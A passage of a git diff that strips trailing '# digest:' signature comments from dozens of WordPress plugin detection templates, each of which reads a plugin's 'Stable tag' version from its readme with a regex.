4a0a0047304502202652fcbb3827fafaaffea3010095f08345c071f196afdf417b47db5a3a2bb1b60221009e66044a00540b2041238b2673bed98f7909c9e3b1a03d6188655362e3074f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index e6ef340f3c..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb829a58c4b240800a965ba89d1fd9dd700e077d6f1aaaaf6dcb7cb8b605f9fb02203148d4e98c3c5b06305ae7aaba00d296dea4be18a22d8fece91abd76ce76b5cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index daed09b076..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022058bee5e2a39b9a7a06d1eb99185cbbf588380c5a0fa4e4f19e7b7b3cc56aa9d1022100f2ad8c4294c7f046bd442af7976cc81d03d7cd9d4b2462d7c1e956113f9bf515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index de30014f98..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022020fdb1a816729f1790884f8c7dc70f4ec128bc8328446398a976f8a8631b975002210096b3db22a773d9f958e32f97f97736733fc25c006005116dad819742a3b04cbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c9a407dd96..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022016baa827c8c86fe0e07c5836b7ced1b4419c2dd593e8d92a30c5c8615e3eadbb02204f4df934313a8dbcce0175bf9c46b46c3754c34985a9ed375e94e072daf60819:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 5bca035cc4..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bbd50598b976c1e80715adce0d8c0c09152fedcc71f6215308346148e21cf450022054f8651d619682fe476e4d8d5d70f30510d50182b1c45306052fabca3f90ab45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 8dd31e0725..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d429a2f88b3628453fa70668af1f7080d52bf498914d3994fa4fcf6c38f5714a022100b636c3c4358020363c6426561a39eaff57fc130d710aecdca763446859b337fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 5096a2b0f6..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fb990d1363a6cd4974fca996f89c70def679cb436126f90a8a24886730e6374902206d048cfd33fd288063d54507f25c9cd067918c3fc8202ad4746c5de0306a5afd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index bd2c1a0bf3..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022048cf82a03085a7482f2e90bee5ab92d6c1e2f134608a91f729b2279f3d606ce402206df004c86b856d502044a553d0a255aaa37b62abd0c6465c23595de26b8c8a6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 4d757c7183..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b9454d0b3e055a855947dd55878bc98e62dc8b97eb02e9000357dc4a5e853b7022041c7dca599950d6347ffdf510fe458f071ec7f229327640584f226cbd521f113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index d340c8fbfb..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100efd1f3cfd558b17c259498ab4fe4889f3a0401f89bc42c18468c00edb10a7613022100a6a1b5def844a389dbf832b34ab814c71daf75beb0dcc046d8f876ae29091a10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index cae041142c..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206de5e201f368dfbc446d901528cc107b3a02028bf48b4e064d836ee14cce5860022100ee1d9e198faf67b1e5d0d7ec5d7df7941499b030f4a48e95b6a8d1cf48db0593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 90a523addc..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205a6f2f3b61abddc27b68ef653ba127a624b1e0d0d4840c9c75b25d538368eced022030ee3bdc6255ea3f6665c120524263a85daa17f76c6229a1c777925bd204750e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 04e39289d0..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e91e48f076f51000802befc8baf1eb895b00439dc7c427c35b39b83baec16ae30220290a049459f81d804dde4ce142857170b9019ab062ef3312010d4154e41220ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index cc7528d044..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100810a272b20d1b35a8648647d418c065441c3daea5df91fd6c9e2f989995c9046022100a83437ca99e07ac06acd856fdfa9976701b17e33b8cf823b5d915836949be843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 6bfbe5b61a..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210091ec6cf3bb2182eb9cda937ceb03493773eb310f5567abbd5f4435fbb9f86b5802205989061e105bb6d8280be2695a44645d27243a8afa9fb23457ea2576ba1b4fb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index d27bf3ad80..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cedd440f2fb9bff525bfffd716a4213794238f1545df248ecba88f286973877202207d3cab92a2c910fe15ee63868a4f8c61bd1036ace02958cf2397f651f6bb3fdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index c4f237a3cb..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220042222702854b6913d958045dbaee077f69dc44779f05e52baa92441f41f8f8d02207dcdff3a489a22299ebc866aec1304307f0d5d078830e3b5d5b9a7e7f6ec337a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index fc47684f71..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e8000dd6482dfa3fe8af25961758250076f6b1e9aaa4aaa83ac9d98d034aa2ac022077840480cfbcb127138cf750928adf9ea2cf58ed1dd4ce8b6736d84895ed3e72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index ae68eef6e5..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044021f3136920d3c380f2a34988f6e8484f4e62bbcda4a55224956e23c7d6e598647022100c914dec03d37b5e320d15a36212b035318ba4d574b9275ea32d69a3ecc0211a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 8515fad8a5..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022058fff78564219048d767e26647fb69729ec82f9e21b64e22666dc52862f96e1802205f18b063b9b53e1efe45deaf1c7a91a1faa765e19ad4bdf5ac44d11d823eae35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 08d5a302af..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f7637b387ebfe00741523285f2ca4772c138a50654ed3d22c7e85d688a8b8fce022100e0c74fa824d3d9155f490db74990f78d0ad675666d27da511156f28653f08700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index e5cfaf92b1..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220209967a79afa1dca188bd12d701c269a1c488d2707c69959d05b8877d689ed95022001d7b3f351b147c4575f8023b3535ab2d67184ebba8deff2d728651f41caf3d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index b98a46f57f..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009626ff10445d212929e964875a6e6f0106964f4014510ddb87a01aefb59747ac02203deb60d6213cd3d4a5c08dae51cdf8e213cc2e68a7e56d77a34c5b77dc9fd7d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 28e9fe4e75..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022023ae4160236531a740a798a3bf9d64326329d59ab58e955995fdf3b0975ec805022100beba09d56524d709fa6bf3ac6b145b10ee2356c40334449c504ea57cabff1189:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index e2ab46af6c..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022033c5718174b439a4bd243bdae28b8706d1e9bfa9f68d25d78a8c654caa76eda3022100a776347d1c7840a0b4db220c5115d23294497dd92c353e91b04ed7b47f64dfe3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 40eeac52ff..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c48d69e47142e2e14fbab7d0096e2f7bb6d1c7884d484c937080b8d61da1ca350221009a465a0878cfb86334e00ca00bef0960500d5ec0271e4422ecb5bed495c3aa2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 9ae14ceaf7..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204655e54017ba0a8ba5c9e32cc959375e378c27a7f49f7c733c8e988388b94dfa022017ec07ab051be7f3b2ec5217ceb11f6bc93ce301c6cf89f4c6d2d46b77f16c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 6c8debc9d9..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022057866fde8c0b2e252c60edf061522096df0d34dc8b9afe9fd6cc22bf1c242af4022100a03520d12638a94fc2b97ce97a59cc5c055adf30bdd954ace1d9db127bb4cfc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 365417d127..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2f51335612594a454371e6962b47ac0b5dfc6cbcd24257f8f21ad9539672868022100da5a60c9f4729752a1404daf9f14c001885ada34c2eeb86af2cc76e835f7f844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 23c1bc74ad..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008d6297f49c6bfc0a6bb7c13719b6cbc2995aaa469a0d303dfd57a708d1fcdb010221009171b60d971d26a7eee876e5d67c3f469cc10782ee5c187f33a6a759f1ae292d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 5301b31f5e..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008699c9d6da156926de398b87878208fcb6893ca91b796daac19a663a5f817da302201118d1f2ee3efc510ba784d66dede3f7afa28a70498771daf4859287a91f7811:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 82a350e946..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053d2dde042e76f15509bdf81529d40e72b95b2000f8968630dc62448a2fd2b88022031ebba7eb0c6ae6b16a2446e318a1c4144b930fae879ce3ee7a5ba24d68c6faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index bde37707cc..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a8fbe8e00ec0d436215ef667f353aaac5cba57fc752e5e8841167ea1b5a357b022007750042a2dcff9750301ab8dc656b08291f3fc16f11d873e309f79e5fac4ffe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 3bef3a6101..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022010c3b1d582264fa747a12b19764130e93a4b3d0eac288ef1eb1d5905a734d551022033361a5545bbe46d09c2eb6336c5a836bfe6bb87f05e00e54e6c3183cbd55132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index fae4d1847e..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f1f669743e9a1e534e96a8f7b31f4957c988b48281cd28db38fa122278a9fb7022100e495be0ed03ef2d2cb1c7032ac8d79cad91af5a90f012ff426087dcd1727b929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index eb54547740..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100906dbd628506eb186fc9879d58315791b617425775b672aec3bf2bc06f6db10f022100b0018a7a7559d95da62a837c698969d0066e9259eb83c034d50f2a31a207844e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 699876482e..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024159f070c304e1f63b78aad626575a9a09c67f075ddf9914fddff6b9817e9c8022005fb3b1773b7619389f8d968dc10dce354dd8d85cbfc8423b6e11e41b9b0435b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index b67065cd23..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d3e683bbd64eccf833013cfc63b6b07536a7227d48fd15687c6c9d451afa6cec022020a09bf76a6c12aa5f3ab34cf77ee704005d7387dc64c092a013aac6346e9c14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 0149891db5..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044021f33c4c262f162d1ce5d6b7e4b8d27c82f940ad82725839415bcbfe5a569a3b6022100f9c6bb62101c0cc624379a49d89c077b04a05907882dab317697abad1c43e2f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 8eb01b7210..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009f6cd89961dd70af2b83e2953c06f798c052b3898dd7561469df4d066969f21602210083cce36a6b3cc0d2a6f1d8197c8ae65597703de58d2d278810de5da46f37493f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 123d10e5bc..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200171ce418fef10f3f2be22931cf1777f9344d221dd9fd5be1f5680e6f283e5d60220368de6e367adfe0265c6d4e3792d4623a85fae42135d6e98ce27aab3e97c1e1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index dcf015bd3c..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0877ff740797846620a57bc57021cc65d907dd1cfb8e0062a664fcb28345e2302207753bd9b913bfaf6ae1cd693829d95451d8e49b449f4f7f98a0a8df51fa77642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index e0f0473006..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220764badbca9d36bacf01f641afee9a1f55b1f5b4430293961cc457d0a32854a4b022100999d3458f82c524a39360b004d6fef963321288ecf756ffcf2092dc5628d5871:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 5761fe1eb9..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022030df33adcafbdcd63d8962ac4f30f178c70f5ad3c8fd9ca0f7a3148d07d4f9e4022032c4c8f05ef9b4dc377488e9217ef49c7a8392a0fc4cdae160c637d139b60e26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 4b4e65de0e..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022066bb9ba7ef0f6db996e7fde53b80231f2016255365d198c1e98ab51b79b985100220269779b58a5a69438e62b0a1dc1d051edf24f8a80006457f8242bb6ecd81676e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 6969b62a20..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200176d2f524122ea58cec79594feaf2f39d48cef681c23334205215357ab93c4a022100ecc1b679832dc87e32e048c91f8fc51fb31de85ccf752f815b74921acdde692a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 3b4eb944f5..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100da2a9b78b47324e4bf8da4ab9b03a5662bcb7797c201604f735258da2c34dcba022025aa7f427eb6820f79586a6cdce2d55092a2980292313a849620c4e01cfec90c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 34ecfa1292..fc126d83c6 100644 --- 